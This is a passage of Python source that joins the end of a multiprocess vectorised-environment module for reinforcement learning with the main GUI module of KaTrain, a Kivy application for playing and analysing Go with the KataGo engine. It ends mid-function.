Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close(self):
"""
Clean up the environments' resources.
"""
pass
def step(self, actions):
self.step_async(actions)
return self.step_wait()
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns, spaces=None, render=False, shared=None):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
#~ self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
#~ for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
if not render:
self.ps = [Process(target=worker,
kwargs=dict(remote=work_remote,
parent_remote=remote,
env_fn_wrapper=CloudpickleWrapper(env_fn),
shared=shared,
) )
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
else:
self.ps = [Process(target=worker,
kwargs=dict(remote=work_remote,
parent_remote=remote,
env_fn_wrapper=CloudpickleWrapper(env_fn),
render=(i==0),
shared=shared,
) )
for (work_remote, remote, env_fn, i) in zip(self.work_remotes, self.remotes, env_fns, range(nenvs))]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self, task=None):
for remote in self.remotes:
remote.send(('reset_task', task))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
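# Hedged usage sketch (assumes the `gym` package is available; "CartPole-v1" is only an
# illustrative environment id, nothing in this module depends on it). On platforms that
# use the "spawn" start method, call this under an `if __name__ == "__main__":` guard.
def _example_subproc_vec_env(num_envs=4):
    import gym
    env_fns = [lambda: gym.make("CartPole-v1") for _ in range(num_envs)]
    vec_env = SubprocVecEnv(env_fns)  # one worker process per environment
    obs = vec_env.reset()  # stacked observations, one row per environment
    actions = [vec_env.action_space.sample() for _ in range(num_envs)]
    obs, rewards, dones, infos = vec_env.step(actions)  # step all envs in lock-step
    vec_env.close()
    return obs, rewards, dones, infos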
|
__main__.py
|
"""isort:skip_file"""
# first, logging level lower
import os
os.environ["KCFG_KIVY_LOG_LEVEL"] = os.environ.get("KCFG_KIVY_LOG_LEVEL", "warning")
# if "KIVY_AUDIO" not in os.environ: # trying default again
# os.environ["KIVY_AUDIO"] = "sdl2" # some backends hard crash / this seems to be most stable
import kivy
kivy.require("2.0.0")
# next, icon
from katrain.core.utils import find_package_resource, PATHS
from kivy.config import Config
from kivy.utils import platform
ICON = find_package_resource("katrain/img/icon.ico")
Config.set("kivy", "window_icon", ICON)
Config.set("input", "mouse", "mouse,multitouch_on_demand")
import re
import signal
import json
import sys
import threading
import traceback
from queue import Queue
import urllib3
import webbrowser
import time
import random
import glob
from kivy.base import ExceptionHandler, ExceptionManager
from kivy.app import App
from kivy.core.clipboard import Clipboard
from kivy.lang import Builder
from kivy.resources import resource_add_path
from kivy.uix.popup import Popup
from kivy.uix.screenmanager import Screen
from kivy.core.window import Window
from kivy.uix.widget import Widget
from kivy.resources import resource_find
from kivy.properties import NumericProperty, ObjectProperty, StringProperty
from kivy.clock import Clock
from kivy.metrics import dp
from katrain.core.ai import generate_ai_move
from kivy.utils import platform as kivy_platform
from katrain.core.lang import DEFAULT_LANGUAGE, i18n
from katrain.core.constants import (
OUTPUT_ERROR,
OUTPUT_KATAGO_STDERR,
OUTPUT_INFO,
OUTPUT_DEBUG,
OUTPUT_EXTRA_DEBUG,
MODE_ANALYZE,
HOMEPAGE,
VERSION,
STATUS_ERROR,
STATUS_INFO,
PLAYING_NORMAL,
PLAYER_HUMAN,
SGF_INTERNAL_COMMENTS_MARKER,
MODE_PLAY,
DATA_FOLDER,
AI_DEFAULT,
)
from katrain.gui.popups import (
ConfigTeacherPopup,
ConfigTimerPopup,
I18NPopup,
SaveSGFPopup,
ContributePopup,
EngineRecoveryPopup,
)
from katrain.gui.sound import play_sound
from katrain.core.base_katrain import KaTrainBase
from katrain.core.engine import KataGoEngine
from katrain.core.contribute_engine import KataGoContributeEngine
from katrain.core.game import Game, IllegalMoveException, KaTrainSGF, BaseGame
from katrain.core.sgf_parser import Move, ParseError
from katrain.gui.popups import ConfigPopup, LoadSGFPopup, NewGamePopup, ConfigAIPopup
from katrain.gui.theme import Theme
from kivymd.app import MDApp
# used in kv
from katrain.gui.kivyutils import *
from katrain.gui.widgets import MoveTree, I18NFileBrowser, SelectionSlider, ScoreGraph # noqa F401
from katrain.gui.badukpan import AnalysisControls, BadukPanControls, BadukPanWidget # noqa F401
from katrain.gui.controlspanel import ControlsPanel # noqa F401
class KaTrainGui(Screen, KaTrainBase):
"""Top level class responsible for tying everything together"""
zen = NumericProperty(0)
controls = ObjectProperty(None)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.engine = None
self.contributing = False
self.new_game_popup = None
self.fileselect_popup = None
self.config_popup = None
self.ai_settings_popup = None
self.teacher_settings_popup = None
self.timer_settings_popup = None
self.contribute_popup = None
self.pondering = False
self.animate_contributing = False
self.message_queue = Queue()
self.last_key_down = None
self.last_focus_event = 0
def log(self, message, level=OUTPUT_INFO):
super().log(message, level)
if level == OUTPUT_KATAGO_STDERR and "ERROR" not in self.controls.status.text:
if self.contributing:
self.controls.set_status(message, STATUS_INFO)
elif "starting" in message.lower():
self.controls.set_status("KataGo engine starting...", STATUS_INFO)
elif message.startswith("Tuning"):
self.controls.set_status(
"KataGo is tuning settings for first startup, please wait." + message, STATUS_INFO
)
return
elif "ready" in message.lower():
self.controls.set_status("KataGo engine ready.", STATUS_INFO)
if (
level == OUTPUT_ERROR
or (level == OUTPUT_KATAGO_STDERR and "error" in message.lower() and "tuning" not in message.lower())
) and getattr(self, "controls", None):
self.controls.set_status(f"ERROR: {message}", STATUS_ERROR)
def handle_animations(self, *_args):
if self.contributing and self.animate_contributing:
self.engine.advance_showing_game()
if (self.contributing and self.animate_contributing) or self.pondering:
self.board_controls.engine_status_pondering += 5
else:
self.board_controls.engine_status_pondering = -1
@property
def play_analyze_mode(self):
return self.play_mode.mode
def toggle_continuous_analysis(self):
if self.contributing:
self.animate_contributing = not self.animate_contributing
else:
if self.pondering:
self.controls.set_status("", STATUS_INFO)
self.pondering = not self.pondering
self.update_state()
def start(self):
if self.engine:
return
self.board_gui.trainer_config = self.config("trainer")
self.engine = KataGoEngine(self, self.config("engine"))
threading.Thread(target=self._message_loop_thread, daemon=True).start()
sgf_args = [
f
for f in sys.argv[1:]
if os.path.isfile(f) and any(f.lower().endswith(ext) for ext in ["sgf", "ngf", "gib"])
]
if sgf_args:
self.load_sgf_file(sgf_args[0], fast=True, rewind=True)
else:
self._do_new_game()
Clock.schedule_interval(self.handle_animations, 0.1)
Window.request_keyboard(None, self, "").bind(on_key_down=self._on_keyboard_down, on_key_up=self._on_keyboard_up)
def set_focus_event(*args):
self.last_focus_event = time.time()
MDApp.get_running_app().root_window.bind(focus=set_focus_event)
def update_gui(self, cn, redraw_board=False):
# Handle prisoners and next player display
prisoners = self.game.prisoner_count
top, bot = [w.__self__ for w in self.board_controls.circles] # no weakref
if self.next_player_info.player == "W":
top, bot = bot, top
self.controls.players["W"].active = True
self.controls.players["B"].active = False
else:
self.controls.players["W"].active = False
self.controls.players["B"].active = True
self.board_controls.mid_circles_container.clear_widgets()
self.board_controls.mid_circles_container.add_widget(bot)
self.board_controls.mid_circles_container.add_widget(top)
self.controls.players["W"].captures = prisoners["W"]
self.controls.players["B"].captures = prisoners["B"]
# update engine status dot
if not self.engine or not self.engine.katago_process or self.engine.katago_process.poll() is not None:
self.board_controls.engine_status_col = Theme.ENGINE_DOWN_COLOR
elif self.engine.is_idle():
self.board_controls.engine_status_col = Theme.ENGINE_READY_COLOR
else:
self.board_controls.engine_status_col = Theme.ENGINE_BUSY_COLOR
self.board_controls.queries_remaining = self.engine.queries_remaining()
# redraw board/stones
if redraw_board:
self.board_gui.draw_board()
self.board_gui.redraw_board_contents_trigger()
self.controls.update_evaluation()
self.controls.update_timer(1)
# update move tree
self.controls.move_tree.current_node = self.game.current_node
def update_state(self, redraw_board=False): # redirect to message queue thread
self("update_state", redraw_board=redraw_board)
def _do_update_state(
self, redraw_board=False
): # is called after every message and on receiving analyses and config changes
# AI and Trainer/auto-undo handlers
if not self.game or not self.game.current_node:
return
cn = self.game.current_node
if not self.contributing:
last_player, next_player = self.players_info[cn.player], self.players_info[cn.next_player]
if self.play_analyze_mode == MODE_PLAY and self.nav_drawer.state != "open" and self.popup_open is None:
points_lost = cn.points_lost
if (
last_player.human
and cn.analysis_complete
and points_lost is not None
and points_lost > self.config("trainer/eval_thresholds")[-4]
):
self.play_mistake_sound(cn)
teaching_undo = cn.player and last_player.being_taught and cn.parent
if (
teaching_undo
and cn.analysis_complete
and cn.parent.analysis_complete
and not cn.children
and not self.game.end_result
):
self.game.analyze_undo(cn) # not via message loop
if (
cn.analysis_complete
and next_player.ai
and not cn.children
and not self.game.end_result
and not (teaching_undo and cn.auto_undo is None)
): # cn mismatch stops this if undo fired. avoid message loop here or fires repeatedly.
self._do_ai_move(cn)
Clock.schedule_once(self.board_gui.play_stone_sound, 0.25)
if self.engine:
if self.pondering:
self.game.analyze_extra("ponder")
else:
self.engine.stop_pondering()
Clock.schedule_once(lambda _dt: self.update_gui(cn, redraw_board=redraw_board), -1) # trigger?
def update_player(self, bw, **kwargs):
super().update_player(bw, **kwargs)
if self.game:
sgf_name = self.game.root.get_property("P" + bw)
self.players_info[bw].name = None if not sgf_name or SGF_INTERNAL_COMMENTS_MARKER in sgf_name else sgf_name
if self.controls:
self.controls.update_players()
self.update_state()
for player_setup_block in PlayerSetupBlock.INSTANCES:
player_setup_block.update_player_info(bw, self.players_info[bw])
def set_note(self, note):
self.game.current_node.note = note
# The message loop is here to make sure moves happen in the right order, and slow operations don't hang the GUI
def _message_loop_thread(self):
while True:
game, msg, args, kwargs = self.message_queue.get()
try:
self.log(f"Message Loop Received {msg}: {args} for Game {game}", OUTPUT_EXTRA_DEBUG)
if game != self.game.game_id:
self.log(
f"Message skipped as it is outdated (current game is {self.game.game_id}", OUTPUT_EXTRA_DEBUG
)
continue
msg = msg.replace("-", "_")
if self.contributing:
if msg not in [
"katago_contribute",
"redo",
"undo",
"update_state",
"save_game",
"find_mistake",
]:
self.controls.set_status(
i18n._("gui-locked").format(action=msg), STATUS_INFO, check_level=False
)
continue
fn = getattr(self, f"_do_{msg}")
fn(*args, **kwargs)
if msg != "update_state":
self._do_update_state()
except Exception as exc:
self.log(f"Exception in processing message {msg} {args}: {exc}", OUTPUT_ERROR)
traceback.print_exc()
def __call__(self, message, *args, **kwargs):
if self.game:
if message.endswith("popup"): # gui code needs to run in main kivy thread.
if self.contributing and "save" not in message and message != "contribute-popup":
self.controls.set_status(
i18n._("gui-locked").format(action=message), STATUS_INFO, check_level=False
)
return
fn = getattr(self, f"_do_{message.replace('-', '_')}")
Clock.schedule_once(lambda _dt: fn(*args, **kwargs), -1)
else: # game related actions
self.message_queue.put([self.game.game_id, message, args, kwargs])
def _do_new_game(self, move_tree=None, analyze_fast=False, sgf_filename=None):
self.pondering = False
mode = self.play_analyze_mode
if (move_tree is not None and mode == MODE_PLAY) or (move_tree is None and mode == MODE_ANALYZE):
self.play_mode.switch_ui_mode() # for new game, go to play, for loaded, analyze
self.board_gui.animating_pv = None
self.engine.on_new_game() # clear queries
self.game = Game(
self,
self.engine,
move_tree=move_tree,
analyze_fast=analyze_fast or not move_tree,
sgf_filename=sgf_filename,
)
for bw, player_info in self.players_info.items():
player_info.sgf_rank = self.game.root.get_property(bw + "R")
player_info.calculated_rank = None
if sgf_filename is not None: # load game->no ai player
player_info.player_type = PLAYER_HUMAN
player_info.player_subtype = PLAYING_NORMAL
self.update_player(bw, player_type=player_info.player_type, player_subtype=player_info.player_subtype)
self.controls.graph.initialize_from_game(self.game.root)
self.update_state(redraw_board=True)
def _do_katago_contribute(self):
if self.contributing and not self.engine.server_error and self.engine.katago_process is not None:
return
self.contributing = self.animate_contributing = True # special mode
if self.play_analyze_mode == MODE_PLAY: # switch to analysis view
self.play_mode.switch_ui_mode()
self.pondering = False
self.board_gui.animating_pv = None
for bw, player_info in self.players_info.items():
self.update_player(bw, player_type=PLAYER_AI, player_subtype=AI_DEFAULT)
self.engine.shutdown(finish=False)
self.engine = KataGoContributeEngine(self)
self.game = BaseGame(self)
def _do_insert_mode(self, mode="toggle"):
self.game.set_insert_mode(mode)
if self.play_analyze_mode != MODE_ANALYZE:
self.play_mode.switch_ui_mode()
def _do_ai_move(self, node=None):
if node is None or self.game.current_node == node:
mode = self.next_player_info.strategy
settings = self.config(f"ai/{mode}")
if settings is not None:
generate_ai_move(self.game, mode, settings)
else:
self.log(f"AI Mode {mode} not found!", OUTPUT_ERROR)
def _do_undo(self, n_times=1):
if n_times == "smart":
n_times = 1
if self.play_analyze_mode == MODE_PLAY and self.last_player_info.ai and self.next_player_info.human:
n_times = 2
self.board_gui.animating_pv = None
self.game.undo(n_times)
def _do_reset_analysis(self):
self.game.reset_current_analysis()
def _do_resign(self):
self.game.current_node.end_state = f"{self.game.current_node.player}+R"
def _do_redo(self, n_times=1):
self.board_gui.animating_pv = None
self.game.redo(n_times)
def _do_find_mistake(self, fn="redo"):
self.board_gui.animating_pv = None
getattr(self.game, fn)(9999, stop_on_mistake=self.config("trainer/eval_thresholds")[-4])
def _do_switch_branch(self, *args):
self.board_gui.animating_pv = None
self.controls.move_tree.switch_branch(*args)
def _do_play(self, coords):
self.board_gui.animating_pv = None
try:
self.game.play(Move(coords, player=self.next_player_info.player))
except IllegalMoveException as e:
self.controls.set_status(f"Illegal Move: {str(e)}", STATUS_ERROR)
def _do_analyze_extra(self, mode, **kwargs):
self.game.analyze_extra(mode, **kwargs)
def _do_selfplay_setup(self, until_move, target_b_advantage=None):
self.game.selfplay(int(until_move) if isinstance(until_move, float) else until_move, target_b_advantage)
def _do_select_box(self):
self.controls.set_status(i18n._("analysis:region:start"), STATUS_INFO)
self.board_gui.selecting_region_of_interest = True
def _do_new_game_popup(self):
self.controls.timer.paused = True
if not self.new_game_popup:
self.new_game_popup = I18NPopup(
title_key="New Game title", size=[dp(800), dp(900)], content=NewGamePopup(self)
).__self__
self.new_game_popup.content.popup = self.new_game_popup
self.new_game_popup.open()
self.new_game_popup.content.update_from_current_game()
def _do_timer_popup(self):
self.controls.timer.paused = True
if not self.timer_settings_popup:
self.timer_settings_popup = I18NPopup(
title_key="timer settings", size=[dp(600), dp(500)], content=ConfigTimerPopup(self)
).__self__
self.timer_settings_popup.content.popup = self.timer_settings_popup
self.timer_settings_popup.open()
def _do_teacher_popup(self):
self.controls.timer.paused = True
if not self.teacher_settings_popup:
self.teacher_settings_popup = I18NPopup(
title_key="teacher settings", size=[dp(800), dp(800)], content=ConfigTeacherPopup(self)
).__self__
self.teacher_settings_popup.content.popup = self.teacher_settings_popup
self.teacher_settings_popup.open()
def _do_config_popup(self):
self.controls.timer.paused = True
if not self.config_popup:
self.config_popup = I18NPopup(
title_key="general settings title", size=[dp(1200), dp(950)], content=ConfigPopup(self)
).__self__
self.config_popup.content.popup = self.config_popup
self.config_popup.title += ": " + self.config_file
self.config_popup.open()
def _do_contribute_popup(self):
if not self.contribute_popup:
self.contribute_popup = I18NPopup(
title_key="contribute settings title", size=[dp(1100), dp(800)], content=ContributePopup(self)
).__self__
self.contribute_popup.content.popup = self.contribute_popup
self.contribute_popup.open()
def _do_ai_popup(self):
self.controls.timer.paused = True
if not self.ai_settings_popup:
self.ai_settings_popup = I18NPopup(
title_key="ai settings", size=[dp(750), dp(750)], content=ConfigAIPopup(self)
).__self__
self.ai_settings_popup.content.popup = self.ai_settings_popup
self.ai_settings_popup.open()
def _do_engine_recovery_popup(self, error_message, code):
current_open = self.popup_open
if current_open and isinstance(current_open.content, EngineRecoveryPopup):
self.log(f"Not opening engine recovery popup with {error_message} as one is already open", OUTPUT_DEBUG)
return
popup = I18NPopup(
title_key="engine recovery",
size=[dp(600), dp(700)],
content=EngineRecoveryPopup(self, error_message=error_message, code=code),
).__self__
popup.content.popup = popup
popup.open()
def play_mistake_sound(self, node):
if self.config("timer/sound") and node.played_sound is None and Theme.MISTAKE_SOUNDS:
node.played_sound = True
play_sound(random.choice(Theme.MISTAKE_SOUNDS))
def load_sgf_file(self, file, fast=False, rewind=True):
if self.contributing:
return
try:
file = os.path.abspath(file)
move_tree = KaTrainSGF.parse_file(file)
except (ParseError, FileNotFoundError) as e:
self.log(i18n._("Failed to load SGF").format(error=e), OUTPUT_ERROR)
return
self._do_new_game(move_tree=move_tree, analyze_fast=fast, sgf_filename=file)
if not rewind:
self.game.redo(999)
def _do_analyze_sgf_popup(self):
if not self.fileselect_popup:
popup_contents = LoadSGFPopup(self)
popup_contents.filesel.path = os.path.abspath(os.path.expanduser(self.config("general/sgf_load", ".")))
self.fileselect_popup = I18NPopup(
title_key="load sgf title", size=[dp(1200), dp(800)], content=popup_contents
).__self__
def readfile(*_args):
filename = popup_contents.filesel.filename
self.fileselect_popup.dismiss()
path, file = os.path.split(filename)
if path != self.config("general/sgf_load"):
self.log(f"Updating sgf load path default to {path}", OUTPUT_DEBUG)
self._config["general"]["sgf_load"] = path
popup_contents.update_config(False)
self.save_config("general")
self.load_sgf_file(filename, popup_contents.fast.active, popup_contents.rewind.active)
popup_contents.filesel.on_success = readfile
popup_contents.filesel.on_submit = readfile
self.fileselect_popup.open()
self.fileselect_popup.content.filesel.ids.list_view._trigger_update()
def _do_save_game(self, filename=None):
filename = filename or self.game.sgf_filename
if not filename:
return self("save-game-as-popup")
try:
msg = self.game.write_sgf(filename)
self.log(msg, OUTPUT_INFO)
self.controls.set_status(msg, STATUS_INFO, check_level=False)
except Exception as e:
self.log(f"Failed to save SGF to {filename}: {e}", OUTPUT_ERROR)
def _do_save_game_as_popup(self):
popup_contents = SaveSGFPopup(suggested_filename=self.game.generate_filename())
save_game_popup = I18NPopup(
title_key="save sgf title", size=[dp(1200), dp(800)], content=popup_contents
).__self__
def readfile(*_args):
filename = popup_contents.filesel.filename
if not filename.lower().endswith(".sgf"):
filename += ".sgf"
save_game_popup.dismiss()
path, file = os.path.split(filename.strip())
if not path:
path = popup_contents.filesel.path # whatever dir is shown
if path != self.config("general/sgf_save"):
self.log(f"Updating sgf save path default to {path}", OUTPUT_DEBUG)
self._config["general"]["sgf_save"] = path
self.save_config("general")
self._do_save_game(os.path.join(path, file))
popup_contents.filesel.on_success = readfile
popup_contents.filesel.on_submit = readfile
save_game_popup.open()
def load_sgf_from_clipboard(self):
clipboard = Clipboard.paste()
if not clipboard:
self.controls.set_status("Ctrl-V pressed but clipboard is empty.", STATUS_INFO)
return
url_match = re.match(r"(?P<url>https?://[^\s]+)", clipboard)
if url_match:
self.log("Recognized url: " + url_match.group(), OUTPUT_INFO)
http = urllib3.PoolManager()
response = http.request("GET", url_match.group())
clipboard = response.data.decode("utf-8")
try:
move_tree = KaTrainSGF.parse_sgf(clipboard)
except Exception as exc:
self.controls.set_status(
i18n._("Failed to import from clipboard").format(error=exc, contents=clipboard[:50]), STATUS_INFO
)
return
move_tree.nodes_in_tree[-1].analyze(
self.engine, analyze_fast=False
) # speed up result for looking at end of game
self._do_new_game(move_tree=move_tree, analyze_fast=True)
self("redo", 9999)
self.log("Imported game from clipboard.", OUTPUT_INFO)
def on_touch_up(self, touch):
if touch.is_mouse_scrolling:
touching_board = self.board_gui.collide_point(*touch.pos) or self.board_controls.collide_point(*touch.pos)
touching_control_nonscroll = self.controls.collide_point(
*touch.pos
) and not self.controls.notes_panel.collide_point(*touch.pos)
if self.board_gui.animating_pv is not None and touching_board:
if touch.button == "scrollup":
self.board_gui.adjust_animate_pv_index(1)
elif touch.button == "scrolldown":
self.board_gui.adjust_animate_pv_index(-1)
elif touching_board or touching_control_nonscroll: # scroll through moves
if touch.button == "scrollup":
self("redo")
elif touch.button == "scrolldown":
self("undo")
return super().on_touch_up(touch)
@property
def shortcuts(self):
return {
k: v
for ks, v in [
(Theme.KEY_ANALYSIS_CONTROLS_SHOW_CHILDREN, self.analysis_controls.show_children),
(Theme.KEY_ANALYSIS_CONTROLS_EVAL, self.analysis_controls.eval),
(Theme.KEY_ANALYSIS_CONTROLS_HINTS, self.analysis_controls.hints),
(Theme.KEY_ANALYSIS_CONTROLS_OWNERSHIP, self.analysis_controls.ownership),
(Theme.KEY_ANALYSIS_CONTROLS_POLICY, self.analysis_controls.policy),
(Theme.KEY_AI_MOVE, ("ai-move",)),
(Theme.KEY_ANALYZE_EXTRA_EXTRA, ("analyze-extra", "extra")),
(Theme.KEY_ANALYZE_EXTRA_EQUALIZE, ("analyze-extra", "equalize")),
(Theme.KEY_ANALYZE_EXTRA_SWEEP, ("analyze-extra", "sweep")),
(Theme.KEY_ANALYZE_EXTRA_ALTERNATIVE, ("analyze-extra", "alternative")),
(Theme.KEY_SELECT_BOX, ("select-box",)),
(Theme.KEY_RESET_ANALYSIS, ("reset-analysis",)),
(Theme.KEY_INSERT_MODE, ("insert-mode",)),
(Theme.KEY_PASS, ("play", None)),
(Theme.KEY_SELFPLAY_TO_END, ("selfplay-setup", "end", None)),
(Theme.KEY_NAV_PREV_BRANCH, ("undo", "branch")),
(Theme.KEY_NAV_BRANCH_DOWN, ("switch-branch", 1)),
(Theme.KEY_NAV_BRANCH_UP, ("switch-branch", -1)),
(Theme.KEY_TIMER_POPUP, ("timer-popup",)),
(Theme.KEY_TEACHER_POPUP, ("teacher-popup",)),
(Theme.KEY_AI_POPUP, ("ai-popup",)),
(Theme.KEY_CONFIG_POPUP, ("config-popup",)),
(Theme.KEY_CONTRIBUTE_POPUP, ("contribute-popup",)),
(Theme.KEY_STOP_ANALYSIS, ("analyze-extra", "stop")),
]
for k in (ks if isinstance(ks, list) else [ks])
}
@property
def popup_open(self) -> Popup:
app = App.get_running_app()
if app:
first_child = app.root_window.children[0]
return first_child if isinstance(first_child, Popup) else None
def _on_keyboard_down(self, _keyboard, keycode, _text, modifiers):
self.last_key_down = keycode
ctrl_pressed = "ctrl" in modifiers or ("meta" in modifiers and kivy_platform == "macosx")
shift_pressed = "shift" in modifiers
if self.controls.note.focus:
return # when making notes, don't allow keyboard shortcuts
popup = self.popup_open
if popup:
if keycode[1] in [
Theme.KEY_DEEPERANALYSIS_POPUP,
Theme.KEY_REPORT_POPUP,
Theme.KEY_TIMER_POPUP,
Theme.KEY_TEACHER_POPUP,
Theme.KEY_AI_POPUP,
Theme.KEY_CONFIG_POPUP,
Theme.KEY_CONTRIBUTE_POPUP,
]: # switch between popups
popup.dismiss()
return
elif keycode[1] in Theme.KEY_SUBMIT_POPUP:
fn = getattr(popup.content, "on_submit", None)
if fn:
fn()
return
else:
return
if keycode[1] == Theme.KEY_TOGGLE_CONTINUOUS_ANALYSIS:
self.toggle_continuous_analysis()
elif keycode[1] == Theme.KEY_TOGGLE_COORDINATES:
self.board_gui.toggle_coordinates()
elif keycode[1] in Theme.KEY_PAUSE_TIMER and not ctrl_pressed:
self.controls.timer.paused = not self.controls.timer.paused
elif keycode[1] in Theme.KEY_ZEN:
self.zen = (self.zen + 1) % 3
elif keycode[1] in Theme.KEY_NAV_PREV:
self("undo", 1 + shift_pressed * 9 + ctrl_pressed * 9999)
elif keycode[1] in Theme.KEY_NAV_NEXT:
self("redo", 1 + shift_pressed * 9 + ctrl_pressed * 9999)
elif keycode[1] == Theme.KEY_NAV_GAME_START:
self("undo", 9999)
elif keycode[1] == Theme.KEY_NAV_GAME_END:
self("redo", 9999)
elif keycode[1] == Theme.KEY_MOVE_TREE_MAKE_SELECTED_NODE_MAIN_BRANCH:
self.controls.move_tree.make_selected_node_main_branch()
elif keycode[1] == Theme.KEY_NAV_MISTAKE and not ctrl_pressed:
self("find-mistake", "undo" if shift_pressed else "redo")
elif keycode[1] == Theme.KEY_MOVE_TREE_DELETE_SELECTED_NODE and ctrl_pressed:
self.controls.move_tree.delete_selected_node()
elif keycode[1] == Theme.KEY_MOVE_TREE_TOGGLE_SELECTED_NODE_COLLAPSE and not ctrl_pressed:
self.controls.move_tree.toggle_selected_node_collapse()
elif keycode[1] == Theme.KEY_NEW_GAME and ctrl_pressed:
self("new-game-popup")
elif keycode[1] == Theme.KEY_LOAD_GAME and ctrl_pressed:
self("analyze-sgf-popup")
elif keycode[1] == Theme.KEY_SAVE_GAME and ctrl_pressed:
self("save-game")
elif keycode[1] == Theme.KEY_SAVE_GAME_AS and ctrl_pressed:
self("save-game-as-popup")
elif keycode[1] == Theme.KEY_COPY and ctrl_pressed:
Clipboard.copy(self.game.root.sgf())
self.controls.set_status(i18n._("Copied SGF to clipboard."), STATUS_INFO)
elif keycode[1] == Theme.KEY_PASTE and ctrl_pressed:
self.load_sgf_from_clipboard()
elif keycode[1] == Theme.KEY_NAV_PREV_BRANCH and shift_pressed:
self("undo", "main-branch")
elif keycode[1] == Theme.KEY_DEEPERANALYSIS_POPUP:
self.analysis_controls.dropdown.open_game_analysis_popup()
elif keycode[1] == Theme.KEY_REPORT_POPUP:
self.analysis_controls.dropdown.open_report_popup()
elif keycode[1] == "f10" and self.debug_level >= OUTPUT_EXTRA_DEBUG:
import yappi
yappi.set_clock_type("cpu")
yappi.start()
self.log("starting profiler", OUTPUT_ERROR)
elif keycode[1] == "f11" and self.debug_level >= OUTPUT_EXTRA_DEBUG:
import time
import yappi
stats = yappi.get_func_stats()
filename = f"callgrind.{int(time.time())}.prof"
stats.save(filename, type="callgrind")
self.log(f"wrote profiling results to {filename}", OUTPUT_ERROR)
elif not ctrl_pressed:
shortcut = self.shortcuts.get(keycode[1])
if shortcut is not None:
if isinstance(shortcut, Widget):
shortcut.trigger_action(duration=0)
else:
self(*shortcut)
def _on_keyboard_up(self, _keyboard, keycode):
if keycode[1] in ["alt", "tab"]:
Clock.schedule_once(lambda *_args: self._single_key_action(keycode), 0.05)
def _single_key_action(self, keycode):
if (
self.controls.note.focus
or self.popup_open
or keycode != self.last_key_down
or time.time() - self.last_focus_event < 0.2 # this is here to prevent alt-tab from firing alt or tab
):
return
if keycode[1] == "alt":
self.nav_drawer.set_state("toggle")
elif keycode[1] == "tab":
self.play_mode.switch_ui_mode()
class KaTrainApp(MDApp):
gui = ObjectProperty(None)
language = StringProperty(DEFAULT_LANGUAGE)
def __init__(self):
super().__init__()
def build(self):
self.icon = ICON # how you're supposed to set an icon
self.title = f"KaTrain v{VERSION}"
self.theme_cls.theme_style = "Dark"
self.theme_cls.primary_palette = "Gray"
self.theme_cls.primary_hue = "200"
kv_file = find_package_resource("katrain/gui.kv")
popup_kv_file = find_package_resource("katrain/popups.kv")
resource_add_path(PATHS["PACKAGE"] + "/fonts")
resource_add_path(PATHS["PACKAGE"] + "/sounds")
resource_add_path(PATHS["PACKAGE"] + "/img")
resource_add_path(os.path.abspath(os.path.expanduser(DATA_FOLDER))) # prefer resources in .katrain
theme_files = glob.glob(os.path.join(os.path.expanduser(DATA_FOLDER), "theme*.json"))
for theme_file in sorted(theme_files):
try:
with open(theme_file) as f:
theme_overrides = json.load(f)
for k, v in theme_overrides.items():
setattr(Theme, k, v)
print(f"[{theme_file}] Found theme override {k} = {v}")
            except Exception as e:
print(f"Failed to load theme file {theme_file}: {e}")
Theme.DEFAULT_FONT = resource_find(Theme.DEFAULT_FONT)
Builder.load_file(kv_file)
Window.bind(on_request_close=self.on_request_close)
Window.bind(on_dropfile=lambda win, file: self.gui.load_sgf_file(file.decode("utf8")))
self.gui = KaTrainGui()
Builder.load_file(popup_kv_file)
win_left = win_top = win_size = None
if self.gui.config("ui_state/restoresize", True):
win_size = self.gui.config("ui_state/size", [])
win_left = self.gui.config("ui_state/left", None)
win_top = self.gui.config("ui_state/top", None)
if not win_size:
window_scale_fac = 1
try:
from screeninfo import get_monitors
for m in get_monitors():
window_scale_fac = min(window_scale_fac, (m.height - 100) / 1000, (m.width - 100) / 1300)
except Exception as e:
window_scale_fac = 0.85
win_size = [1300 * window_scale_fac, 1000 * window_scale_fac]
self.gui.log(f"Setting window size to {win_size} and position to {[win_left, win_top]}", OUTPUT_DEBUG)
Window.size = (win_size[0], win_size[1])
if win_left is not None and win_top is not None:
Window.left = win_left
Window.top = win_top
return self.gui
def on_language(self, _instance, language):
self.gui.log(f"Switching language to {language}", OUTPUT_INFO)
i18n.switch_lang(language)
self.gui._config["general"]["lang"] = language
self.gui.save_config()
if self.gui.game:
self.gui.update_state()
self.gui.controls.set_status("", STATUS_INFO)
def webbrowser(self, site_key):
websites = {
"homepage": HOMEPAGE + "#manual",
"support": HOMEPAGE + "#support",
"contribute:signup": "http://katagotraining.org/accounts/signup/",
"engine:help": HOMEPAGE + "/blob/master/ENGINE.md",
}
if site_key in websites:
